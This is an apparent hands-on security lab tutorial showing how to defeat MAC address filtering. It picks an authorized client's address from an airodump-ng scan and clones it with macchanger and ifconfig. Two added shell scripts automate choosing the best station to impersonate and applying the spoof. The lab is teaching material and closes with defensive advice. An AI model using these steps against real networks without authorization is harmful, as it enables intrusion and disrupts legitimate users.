Bypass MAC Address Filtering on a Network

Beginner

Introduction

MAC address filtering is a network access control in which a router or access point accepts associations only from devices whose MAC addresses appear on an allow list (or rejects those on a deny list). It deters casual intruders, but it is not a robust control: the MAC address is carried in cleartext in every 802.11 frame header, even on a WPA2- or WPA3-encrypted network, so anyone in radio range can read the allowed addresses, and the address an interface uses is a software setting that every major operating system lets you change, or "spoof."

In this lab, you will learn how to bypass MAC address filtering. You will first identify the MAC address of an already authorized client by inspecting a network scan, and then you will use the macchanger tool to change your own network interface's MAC address to match the authorized one. This is a fundamental technique in wireless penetration testing, and it shows why access should be enforced by an authenticated protocol such as WPA2/WPA3 (with a strong passphrase, or 802.1X/EAP in enterprise deployments) rather than by the MAC address alone.

Identify an Authorized Client's MAC from an airodump-ng Scan

In this step, your goal is to find the MAC address of a device that is already authorized to connect to the target network. In a real-world scenario, you would run airodump-ng on a monitor-mode interface and watch the station list fill in; because the 802.11 header is never encrypted, both the access point's BSSID and every associated client's MAC are visible even when the network uses WPA2. For this lab, we have provided a pre-captured scan file that simulates this process.

The scan results are saved in a CSV (Comma-Separated Values) file. airodump-ng writes one when started with -w <prefix> and appends a two-digit sequence number to the prefix, which is where the -01 in the filename comes from. Let's examine this file to find the necessary information. The file is located at ~/project/scans/network-scan-01.csv.

Use the cat command to display the contents of the file:

cat ~/project/scans/network-scan-01.csv

You will see output similar to this:

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, ## beacons, ## IV, LAN IP, id-length, ESSID, Key,Station MAC, First time seen, Last time seen, Power, ## packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2023-10-27 10:00:00, 2023-10-27 10:05:00, 6, 54, WPA2, CCMP, PSK, -50, 100, 50, 192.168.1.1, 10, FilteredNet,,AA:BB:CC:DD:EE:FF, 2023-10-27 10:01:00, 2023-10-27 10:04:50, -45, 1234, 00:11:22:33:44:55,

In this output, look for the Station MAC column: it lists the client devices airodump-ng has heard. Before choosing one, check two things. First, the BSSID field in the station section (00:11:22:33:44:55 here) must match the target access point's BSSID, because the capture also records clients of other networks and clients that are only probing for networks, which airodump-ng shows as (not associated). Second, prefer a station with a healthy packet count (1234 here): that is a client genuinely associated and passing traffic, so it is certainly on the allow list. The address to clone is AA:BB:CC:DD:EE:FF. Take note of it for the next steps.
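As an added example (not part of the original lab), here is a shell helper that applies the check above to an airodump-ng CSV: it skips the access-point table, keeps only stations whose BSSID field matches the target access point, and ranks them by packet count so the most active client comes first. The capture embedded in the script is constructed for the example; it follows the two-section layout airodump-ng actually writes (access points, a blank line, then stations) rather than the single line shown above.

```shell
#!/bin/bash
# Added example: choose a cloneable station from an airodump-ng CSV.
# Not part of the lab; the capture below is constructed, not a real scan.

# Constructed sample: two access points, three stations. Only two stations are
# associated with FilteredNet; the third is merely probing for it.
SAMPLE_CSV=$(cat <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2023-10-27 10:00:00, 2023-10-27 10:05:00,  6,  54, WPA2, CCMP, PSK, -50, 100, 50, 192.168.1.1, 11, FilteredNet,
66:77:88:99:AA:BB, 2023-10-27 10:00:00, 2023-10-27 10:05:00, 11,  54, WPA2, CCMP, PSK, -70,  80,  0, 0.0.0.0,      8, OtherNet,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2023-10-27 10:01:00, 2023-10-27 10:04:50, -45, 1234, 00:11:22:33:44:55,
CC:DD:EE:FF:00:11, 2023-10-27 10:02:00, 2023-10-27 10:04:00, -60,   12, 00:11:22:33:44:55,
DE:AD:BE:EF:00:01, 2023-10-27 10:03:00, 2023-10-27 10:04:00, -55,  300, (not associated), FilteredNet
EOF
)

# stations_for_bssid <bssid>  (CSV on stdin)
# Prints "STATION PACKETS POWER" for every station associated with <bssid>,
# busiest first. Stations of other APs and "(not associated)" probers are dropped.
stations_for_bssid() {
  local target
  target=$(printf '%s' "$1" | tr 'a-f' 'A-F')
  awk -F',' -v target="$target" '
    /^Station MAC/ { in_stations = 1; next }   # the second table starts here
    !in_stations || NF < 6 { next }            # AP rows and the blank separator
    {
      for (i = 1; i <= NF; i++) gsub(/^[ \t]+|[ \t]+$/, "", $i)   # trim padding
      if (toupper($6) == target) printf "%s %s %s\n", toupper($1), $5, $4
    }' | sort -k2,2nr
}

# pick_station <bssid>  (CSV on stdin): the single best candidate to clone.
pick_station() {
  stations_for_bssid "$1" | awk 'NR == 1 { print $1 }'
}

# Usage against the constructed capture; a real run would read the -01.csv file:
#   pick_station 00:11:22:33:44:55 < ~/project/scans/network-scan-01.csv
printf '%s\n' "$SAMPLE_CSV" | pick_station 00:11:22:33:44:55
```

The BSSID comparison is what the lab's simplified sample lets you skip; on a real capture with several networks in range it is the difference between cloning an allowed client and cloning a passer-by.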

Disable Your Wireless Interface with ifconfig

In this step, you will prepare your network interface for the MAC address change. The interface must be brought down first: many Linux drivers refuse to change the address of a running interface, and macchanger then reports that it could not change the MAC because the interface is up or permissions are insufficient. We will use ifconfig, the classic net-tools command for interface configuration. It is deprecated on current distributions in favour of ip from iproute2 (the equivalents are sudo ip link set dev eth0 down and sudo ip link set dev eth0 up), but it is still widely available and its output is easy to read.

First, let's identify your network interface and view its current MAC address. This lab environment runs in a container, so we use the wired eth0 interface; on a real wireless engagement you would apply exactly the same commands to the wireless interface (typically wlan0).

Run the following command to see the details of eth0:

ifconfig eth0

The output will look something like this. Note the ether field, which shows the MAC address the interface is currently using (02:42:ac:11:00:02 is the locally administered address Docker derives for a container's eth0 from its IP address, 172.17.0.2 here).

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.2  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:ac:11:00:02  txqueuelen 0  (Ethernet)
        RX packets 8  bytes 696 (696.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Now, disable the eth0 interface using the down argument. You need sudo privileges to modify network interface states.

sudo ifconfig eth0 down

This command produces no output when it succeeds. Verify that the interface is down by running ifconfig eth0 again: the first line changes from flags=4163<UP,BROADCAST,RUNNING,MULTICAST> to flags=4098<BROADCAST,MULTICAST>, so the UP (and RUNNING) flags are gone.

Clone the Authorized MAC Address using macchanger --mac

In this step, you will use the macchanger utility to change your interface's MAC address to the one you identified earlier. With the network interface disabled, you can now safely modify its properties.

The macchanger tool allows you to view and set the MAC address of a network interface. We will use the --mac (-m) option to set a specific address; the other options you will meet in practice are -s to show the current and permanent addresses without changing anything, -r to pick a fully random address, and -p to restore the permanent hardware address.

Use the following command to change the MAC address of eth0 to AA:BB:CC:DD:EE:FF. Remember to use sudo as this is a privileged operation.

sudo macchanger --mac AA:BB:CC:DD:EE:FF eth0

After running the command, macchanger will report the changes. The output should look like this:

Current MAC:   02:42:ac:11:00:02 (Unknown)
Permanent MAC: 02:42:ac:11:00:02 (Unknown)
New MAC:       aa:bb:cc:dd:ee:ff (UNKNOWN)

This output confirms that your MAC address has been successfully spoofed. Permanent MAC is the address burned into the hardware (what ethtool -P reports), Current MAC is what the interface used before the change, and New MAC is the address now active. macchanger prints addresses in lowercase; MAC addresses are case-insensitive, so aa:bb:cc:dd:ee:ff and AA:BB:CC:DD:EE:FF are the same address. The change lives only in the kernel: it does not survive a reboot, and sudo macchanger -p eth0 restores the permanent address at any time.

Re-enable Your Wireless Interface with ifconfig

In this step, you will bring the network interface back online with its new MAC address. Once the MAC address has been changed, the interface must be re-enabled to apply the changes and allow it to communicate on the network.

Use the ifconfig command with the up argument to re-enable the eth0 interface:

sudo ifconfig eth0 up

This command should not produce any output. To confirm that the interface is up and has the new MAC address, run ifconfig eth0 one more time:

ifconfig eth0

Examine the output. You should see that the ether field now displays your new, spoofed MAC address, and the UP flag has returned to the first line.

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.2  netmask 255.255.0.0  broadcast 172.17.255.255
        ether aa:bb:cc:dd:ee:ff  txqueuelen 0  (Ethernet)
        RX packets 8  bytes 696 (696.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Your interface is now active and presents the authorized device's address. On a live network you would normally also release and renew the DHCP lease at this point, because the existing lease (and the switch's or access point's forwarding table) is bound to the old address.

Verify Your Ability to Connect to the Filtered Network

In this final step, you will verify that your actions were successful. In a real-world scenario, you would now attempt to connect to the MAC-filtered wireless network. Since your device now presents an address on the allow list, the access point would accept the association. One practical caveat: if the legitimate client is still associated, two stations sharing one address disrupt each other's traffic and the collision is easy to notice, so testers wait until that client has gone quiet before reusing its address.

Because we are in a simulated environment, we can't connect to a real Wi-Fi network. Instead, we will run a local script to check if the MAC address of eth0 is correctly set to the target address.

First, create a small shell script to perform this check. Use the nano editor to create a file named check_connection.sh:

nano check_connection.sh

Now, copy and paste the following script content into the nano editor:

#!/bin/bash
# Compare the interface's active MAC with the address cloned from the scan.
# `ip` prints the address in lowercase, so it is uppercased before comparison.
CURRENT_MAC=$(ip addr show eth0 | grep 'link/ether' | awk '{print $2}' | tr '[:lower:]' '[:upper:]')
TARGET_MAC="AA:BB:CC:DD:EE:FF"

if [ "$CURRENT_MAC" == "$TARGET_MAC" ]; then
  echo "Connection successful! Your device is now authorized on the network."
  echo "Current MAC: $CURRENT_MAC"
else
  echo "Connection failed. Your MAC address does not match an authorized device."
  echo "Current MAC: $CURRENT_MAC"
  echo "Expected MAC: $TARGET_MAC"
  exit 1   # non-zero status so the check can be chained from other scripts
fi

Save the file and exit nano by pressing Ctrl+X, then Y, and then Enter.

Next, make the script executable:

chmod +x check_connection.sh

Finally, run the script to verify your connection status:

./check_connection.sh

If you have followed all the steps correctly, you will see the success message:

Connection successful! Your device is now authorized on the network.
Current MAC: AA:BB:CC:DD:EE:FF

This confirms that you have successfully spoofed the MAC address.
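Steps 2 through 5 collected into one script, as an added example that is not part of the original lab. It uses iproute2 (ip link) in place of ifconfig and macchanger, because the check script above already depends on ip and it is what current distributions ship; the interface name and target MAC are command-line arguments (the names spoof_mac, mac_valid and so on are this example's own), and /sys/class/net/<iface>/address is read back as a confirmation independent of the tool that made the change. Assumes Linux with root or CAP_NET_ADMIN when actually applied; the validation helpers run without privileges.

```shell
#!/bin/bash
# Added example, not the lab's code: down / set address / up / verify with iproute2.
# Usage: ./spoof.sh eth0 AA:BB:CC:DD:EE:FF

# Normalise to lowercase so addresses from airodump-ng (uppercase) and from
# macchanger or `ip` (lowercase) compare equal.
mac_normalize() { printf '%s' "$1" | tr 'A-F' 'a-f'; }

# Accept only six colon-separated hex octets.
mac_valid() {
  printf '%s' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# Reject multicast addresses (lowest bit of the first octet set): a station
# cannot use one as a source address and the kernel refuses to assign it.
mac_is_unicast() {
  local first=$(( 0x${1%%:*} ))
  [ $(( first & 1 )) -eq 0 ]
}

# Active address of an interface, read from sysfs rather than tool output.
current_mac() { cat "/sys/class/net/$1/address"; }

# spoof_mac <iface> <mac>: returns 0 only when sysfs shows the new address.
spoof_mac() {
  local iface=$1 mac
  mac=$(mac_normalize "$2")
  mac_valid "$mac"      || { echo "bad MAC: $2" >&2; return 2; }
  mac_is_unicast "$mac" || { echo "multicast MAC rejected: $2" >&2; return 2; }
  [ -d "/sys/class/net/$iface" ] || { echo "no such interface: $iface" >&2; return 2; }
  # The lab's ifconfig down / macchanger --mac / ifconfig up, in iproute2 form.
  # Each step is checked: without CAP_NET_ADMIN (a plain container) the kernel
  # answers "RTNETLINK answers: Operation not permitted" and nothing changes.
  ip link set dev "$iface" down || return 1
  ip link set dev "$iface" address "$mac" || { ip link set dev "$iface" up; return 1; }
  ip link set dev "$iface" up || return 1
  [ "$(current_mac "$iface")" = "$mac" ]
}

# Only act when an interface and a MAC are given on the command line.
if [ $# -eq 2 ]; then
  if spoof_mac "$1" "$2"; then
    echo "$1 is now $(current_mac "$1")"
  else
    echo "failed to set $2 on $1" >&2
    exit 1
  fi
fi
```

Reading the result back from sysfs is the check worth keeping even when you stay with macchanger: the tool's "New MAC" line is what it asked for, not proof of what the driver accepted.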

Summary

In this lab, you have successfully demonstrated how to bypass MAC address filtering on a network. You have learned a complete, step-by-step process that is fundamental to network security testing.

You accomplished this by:

  1. Identifying an authorized client's MAC address from a simulated network scan.
  2. Disabling your network interface using ifconfig.
  3. Cloning the authorized MAC address onto your interface with macchanger.
  4. Re-enabling the network interface to apply the new address.
  5. Verifying that your new MAC address would grant you access.

The key takeaway is that MAC address filtering authorizes devices by an identifier that is transmitted in the clear and never authenticated, so it must not be the only line of defense for a wireless network. For robust security, use WPA2 or WPA3 with a strong, unique passphrase (or 802.1X/EAP authentication in enterprise deployments), and treat MAC filtering at most as a housekeeping measure rather than a security control.